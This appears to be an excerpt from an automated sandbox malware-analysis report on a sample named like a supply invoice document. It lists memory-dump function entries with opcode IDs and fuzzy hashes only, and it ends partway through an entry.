                                                                                                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                • Instruction ID: 02213c4e2692f08c3edcfd2b50bd2bf239b60add3a225d367cfcff4392748a3a
                                                                                                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                • Instruction Fuzzy Hash: 00D0223221203093DB289A996C04F63B905EF80AA4F0A002C360E93904C1048C43C2E0
                                                                                                                                Function 0173A830 Relevance: .0, Instructions: 14COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                • Instruction ID: 44300ac94241e301eb742e01b7cb94308cab649f64ef49fba913b480aee7793d
                                                                                                                                • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                • Instruction Fuzzy Hash: 10D012371D054DBBCB119F66DC01F957BA9E764BA0F444420B514875A0D63AE950D584
                                                                                                                                Function 0173CA24 Relevance: .0, Instructions: 14COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 41c77e1f8aa1ca04c57b25831c7c794aac52b575c4a8a6655dbded060a702651
                                                                                                                                • Instruction ID: 6c3401eb6fb27d2dbdab912269dfdace2110b19d758ddf77deb6f2b198479195
                                                                                                                                • Opcode Fuzzy Hash: 41c77e1f8aa1ca04c57b25831c7c794aac52b575c4a8a6655dbded060a702651
                                                                                                                                • Instruction Fuzzy Hash: ECD0A930A05002CBDF2BEF08CA18E2EFBB0FB50A40F4004ACE700A2025E32ADD02CB00
                                                                                                                                Function 0173C700 Relevance: .0, Instructions: 12COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                • Instruction ID: d5677f1eed71fd4a38bc23dfd53e70e83a5399b2a8535804730f348fa6c4e665
                                                                                                                                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                • Instruction Fuzzy Hash: D3C01232290648AFC712AE99CD01F02BBA9EBA8B50F000421F2048B6B0D631E820EA84
                                                                                                                                Function 01720310 Relevance: .0, Instructions: 11COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                • Instruction ID: 8d335537376763a19074f62af8a8663f3d36513744647193e8168ecec227fc30
                                                                                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                • Instruction Fuzzy Hash: F4D01236100248EFCB01DF41C890D9AB72AFBD8710F108019FD19076118A31ED63DA90
                                                                                                                                Function 01700750 Relevance: .0, Instructions: 9COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                • Instruction ID: 805a0907c37c8a13650b51a1cfbad4d0d16fb2ea3bbf77f7542ad6d795f24eec
                                                                                                                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                • Instruction Fuzzy Hash: F1C04879B01A428FCF16DB2ED298F49B7E4FB44750F150890E885CBB26EA64E941CA10
                                                                                                                                Function 01744340 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7f7ae473f60c81cd247e8552401d6b3681ea7b5c61c5fb67f11f9816c7f663fd
                                                                                                                                • Instruction ID: 9cead5fe6bd7fc936c7e768d0db3be0e3daa60532e23cd124813e3b2ef67b313
                                                                                                                                • Opcode Fuzzy Hash: 7f7ae473f60c81cd247e8552401d6b3681ea7b5c61c5fb67f11f9816c7f663fd
                                                                                                                                • Instruction Fuzzy Hash: 9A900231609800139380715948845468005A7E0301B55C021F4424564CCA648B565762
                                                                                                                                Function 01744650 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 074717604b7bfd431eba5621f0deb1bee8e844431ee4357caee5130592d78f57
                                                                                                                                • Instruction ID: 54d23eb56e5ff0e6d2f58b7ac91b4adeadf4453def82454a9d70fec5615adafe
                                                                                                                                • Opcode Fuzzy Hash: 074717604b7bfd431eba5621f0deb1bee8e844431ee4357caee5130592d78f57
                                                                                                                                • Instruction Fuzzy Hash: E790026160550043438071594804406A005A7E1301395C125B4554570CC6688A55976A
                                                                                                                                Function 01742BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c6716521a5d52d2981750959bacff41889e3446235d8f007ebf640beae847969
                                                                                                                                • Instruction ID: a22484a7e872a24d3e4b2c2702b006521a96cd3454b8f7ca3debbd6d6c4d56eb
                                                                                                                                • Opcode Fuzzy Hash: c6716521a5d52d2981750959bacff41889e3446235d8f007ebf640beae847969
                                                                                                                                • Instruction Fuzzy Hash: 7490023120540803D3C07159440464A400597D1301F95C025B4025664DCA658B597BA2
                                                                                                                                Function 01742BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 88cff82712d9e3580d398209eedf883cb5cbe687a336222ae2a604425c6357b1
                                                                                                                                • Instruction ID: 1d01d54560db1581a57b247b7e420a136f68d06ee057f3019e52e7c48329efa3
                                                                                                                                • Opcode Fuzzy Hash: 88cff82712d9e3580d398209eedf883cb5cbe687a336222ae2a604425c6357b1
                                                                                                                                • Instruction Fuzzy Hash: DB90023120944843D38071594404A46401597D0305F55C021B40646A4DD6758F55BB62
                                                                                                                                Function 01742BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 722a10cec8ec09f7bcaa4c45ebe169580d97b34fe627027ddcfac2b39426337e
                                                                                                                                • Instruction ID: b0976bb76264072413cd2a1703d8193ee540345ea0092f169656a5d23bb2b5cc
                                                                                                                                • Opcode Fuzzy Hash: 722a10cec8ec09f7bcaa4c45ebe169580d97b34fe627027ddcfac2b39426337e
                                                                                                                                • Instruction Fuzzy Hash: 1690023160940803D39071594414746400597D0301F55C021B4024664DC7A58B557BA2
                                                                                                                                Function 01742B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 57e0cc8ae8d893f2650ba9a54cee87d8c0c531cdf9b036bf2b7a9fc3eebbc42a
                                                                                                                                • Instruction ID: 36456be8d95ebca1d72ec4f73e5e18e5042fe1d4493fc5bbd120506acb6d7c05
                                                                                                                                • Opcode Fuzzy Hash: 57e0cc8ae8d893f2650ba9a54cee87d8c0c531cdf9b036bf2b7a9fc3eebbc42a
                                                                                                                                • Instruction Fuzzy Hash: 9290023120540803D34471594804686400597D0301F55C021BA024665ED6B58A917632
                                                                                                                                Function 01742AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ef026b62be4f6636cc9125397f82b97670be2704874d309da5925956d1bf3253
                                                                                                                                • Instruction ID: b642f597ec01e504d58edbd866321bc7744d5bb838a6f9e507aa42ddb51a342e
                                                                                                                                • Opcode Fuzzy Hash: ef026b62be4f6636cc9125397f82b97670be2704874d309da5925956d1bf3253
                                                                                                                                • Instruction Fuzzy Hash: F6900225225400030385B559060450B4445A7D6351395C025F54165A0CC6718A655722
                                                                                                                                Function 01742AD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6d293462cdfa19e218e5a8ac75bc31da1c556b8b4701a70c2b561ba451c7772c
                                                                                                                                • Instruction ID: 41f545b83b9c9d7b724993038021517d4e7f63ffdf392a49ffddad84699acbaa
                                                                                                                                • Opcode Fuzzy Hash: 6d293462cdfa19e218e5a8ac75bc31da1c556b8b4701a70c2b561ba451c7772c
                                                                                                                                • Instruction Fuzzy Hash: 89900435315400030345F55D07045074047D7D5351355C031F5015570CD771CF715733
                                                                                                                                Function 01742AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 38178956b7d2db2e25d689a63941b97a1a371b1eac37484d4de3e8a480cdf26b
                                                                                                                                • Instruction ID: 5b73c8fe7a240e2d45be0a15140b676c511be460f3ef1e3425e8e5cf9a01935a
                                                                                                                                • Opcode Fuzzy Hash: 38178956b7d2db2e25d689a63941b97a1a371b1eac37484d4de3e8a480cdf26b
                                                                                                                                • Instruction Fuzzy Hash: DD9002A1205540934740B2598404B0A850597E0201B55C026F5054570CC5758A519636
                                                                                                                                Function 01742D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d19426fe86f3db1a9e5106b904ffe6c656bfe0b793246519f2bce19d8913f128
                                                                                                                                • Instruction ID: 2d8e60db51d69b0bf777af9912f59a7b2b7e1e18bf6ca9cc0bb2e2c9879af7dd
                                                                                                                                • Opcode Fuzzy Hash: d19426fe86f3db1a9e5106b904ffe6c656bfe0b793246519f2bce19d8913f128
                                                                                                                                • Instruction Fuzzy Hash: 9190022130540003D380715954186068005E7E1301F55D021F4414564CD9658A565723
                                                                                                                                Function 01742D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6855fe13e84e173e4d4957a8252dd4cd7fae4d57a0612667173798a0fa48f17b
                                                                                                                                • Instruction ID: 9efbf6402f16b3f431f5536df27f5e0916409d4943aaa255b2ee225e1eed087c
                                                                                                                                • Opcode Fuzzy Hash: 6855fe13e84e173e4d4957a8252dd4cd7fae4d57a0612667173798a0fa48f17b
                                                                                                                                • Instruction Fuzzy Hash: 8F90022921740003D3C07159540860A400597D1202F95D425B4015568CC9658A695722
                                                                                                                                Function 01742D00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ab64b82ebfb0bc62fa774353b5fd1bd2662b2b27d8d2e65ed026a6521882338d
                                                                                                                                • Instruction ID: df9e281ce702b67e685ec2ef6ed2cec4bbe0ee0cbd9f38db3c2ddd6348a642f0
                                                                                                                                • Opcode Fuzzy Hash: ab64b82ebfb0bc62fa774353b5fd1bd2662b2b27d8d2e65ed026a6521882338d
                                                                                                                                • Instruction Fuzzy Hash: 0E90022120944443D34075595408A06400597D0205F55D021B50645A5DC6758A51A632
                                                                                                                                Function 01742DD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 67e11e1bb1cd0389ee62df81dc3441cbacf9796341c2efbfe4d66e2db92c91de
                                                                                                                                • Instruction ID: 0365183d396c7f0bc696570e9b37cdfefa238d02d3ae539ada6174bf3800ff69
                                                                                                                                • Opcode Fuzzy Hash: 67e11e1bb1cd0389ee62df81dc3441cbacf9796341c2efbfe4d66e2db92c91de
                                                                                                                                • Instruction Fuzzy Hash: 50900221246441535785B15944045078006A7E0241795C022B5414960CC5769A56DB22
                                                                                                                                Function 01742DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f719cb160b7af3ae6b3df762d7526da5775f3f5e8cea8948cf6489c930ede3e5
                                                                                                                                • Instruction ID: 566f216b03de87e903a3dfa15c8a33d44eb4460fe75523b3ff8a034c4312e971
                                                                                                                                • Opcode Fuzzy Hash: f719cb160b7af3ae6b3df762d7526da5775f3f5e8cea8948cf6489c930ede3e5
                                                                                                                                • Instruction Fuzzy Hash: FB90023124540403D381715944046064009A7D0241F95C022B4424564EC6A58B56AF62
                                                                                                                                Function 01742C60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 512f8e2781ea493f07fe5620cc37a99f3f2c7c28f4fb3e231302721e8cdc472b
                                                                                                                                • Instruction ID: 59353800194e113a284f259e5acd8fc7780be5f8e26e282a3b5fc0481d3bbc64
                                                                                                                                • Opcode Fuzzy Hash: 512f8e2781ea493f07fe5620cc37a99f3f2c7c28f4fb3e231302721e8cdc472b
                                                                                                                                • Instruction Fuzzy Hash: 6490023120540843D34071594404B46400597E0301F55C026B4124664DC665CA517A22
                                                                                                                                Function 01742CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 43bc3a8133051907d7b5283f1dd460d6e43226340f084aa67597a48a9f72b184
                                                                                                                                • Instruction ID: 9905c4433bd42113b079fee88582527a52a0c3cfa849cc95deb74ec145dba22e
                                                                                                                                • Opcode Fuzzy Hash: 43bc3a8133051907d7b5283f1dd460d6e43226340f084aa67597a48a9f72b184
                                                                                                                                • Instruction Fuzzy Hash: 2990023120540403D34071595508707400597D0201F55D421B4424568DD6A68A516622
                                                                                                                                Function 01742CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fe88fdf0958d5eefab202ce3e61571163b439d8aed3cdacbdf10d00b9c6e26ff
                                                                                                                                • Instruction ID: 1a8e12329ef04339acf0b0b32844e8ef961a1f64dcc1339fe5b9eb29ea7dfa5d
                                                                                                                                • Opcode Fuzzy Hash: fe88fdf0958d5eefab202ce3e61571163b439d8aed3cdacbdf10d00b9c6e26ff
                                                                                                                                • Instruction Fuzzy Hash: B290022160940403D38071595418706401597D0201F55D021B4024564DC6A98B556BA2
                                                                                                                                Function 01742CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dfad4803dfd334016203d2be0067c6b14be3561ca4d2a3166aa4f89104346580
                                                                                                                                • Instruction ID: d089b35edce1718a02741f865d7cc7fbbe4e8a6f9ef8dd17d031b49e629d242c
                                                                                                                                • Opcode Fuzzy Hash: dfad4803dfd334016203d2be0067c6b14be3561ca4d2a3166aa4f89104346580
                                                                                                                                • Instruction Fuzzy Hash: A690023120540403D34075995408646400597E0301F55D021B9024565EC6B58A916632
                                                                                                                                Function 01742F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9d7d2c4d7f7472c721326450a95b36d0fb4583cb3265742b59a8f5e162141b0d
                                                                                                                                • Instruction ID: 801fba306861d52d9a1ffd6df7ce59b12a2d786c8c5dc1e5d48263fab6ff45e3
                                                                                                                                • Opcode Fuzzy Hash: 9d7d2c4d7f7472c721326450a95b36d0fb4583cb3265742b59a8f5e162141b0d
                                                                                                                                • Instruction Fuzzy Hash: 9390026121540043D34471594404706404597E1201F55C022B6154564CC5798E615626
                                                                                                                                Function 01742F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5f419346d4ebfa8f77589fc0ab79c20394fcf4f8dcd09c31fcaa928a51d418f2
                                                                                                                                • Instruction ID: 0e87141786ad33a06bb575cf773f146f42585b9fe10d1f375911aa7252f04fb1
                                                                                                                                • Opcode Fuzzy Hash: 5f419346d4ebfa8f77589fc0ab79c20394fcf4f8dcd09c31fcaa928a51d418f2
                                                                                                                                • Instruction Fuzzy Hash: 4D90026134540443D34071594414B064005D7E1301F55C025F5064564DC669CE526627
                                                                                                                                Function 01742FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 749eb7349e2e1e7cfec1aaf816a918c6b84535539ac05ea294fda8ee14285326
                                                                                                                                • Instruction ID: bec33966a6e16eb2ee0c0dd34bddec8878d68818ff9a4d74da22d68bbadd05ae
                                                                                                                                • Opcode Fuzzy Hash: 749eb7349e2e1e7cfec1aaf816a918c6b84535539ac05ea294fda8ee14285326
                                                                                                                                • Instruction Fuzzy Hash: B1900221215C0043D34075694C14B07400597D0303F55C125B4154564CC9658A615A22
                                                                                                                                Function 01742FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 56be7e5920a3d2c3f812fdf3f2030bb9c2abb608c784b3065001c8a9f05238ae
                                                                                                                                • Instruction ID: 83b9cbc40241e3273e559932ef65728cfcab50426b98f8942657624bc613ea07
                                                                                                                                • Opcode Fuzzy Hash: 56be7e5920a3d2c3f812fdf3f2030bb9c2abb608c784b3065001c8a9f05238ae
                                                                                                                                • Instruction Fuzzy Hash: 6C900221605400434380716988449068005BBE1211755C131B4998560DC5A98A655B66
                                                                                                                                Function 01742FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0116bcaff66f345e7189197605bd62892d53d3383e798495d7dfcf44c8500bf9
                                                                                                                                • Instruction ID: 4895074f54867c1299381a70913eb0dd26e0fba236f4b9db4c122f9d4886ab48
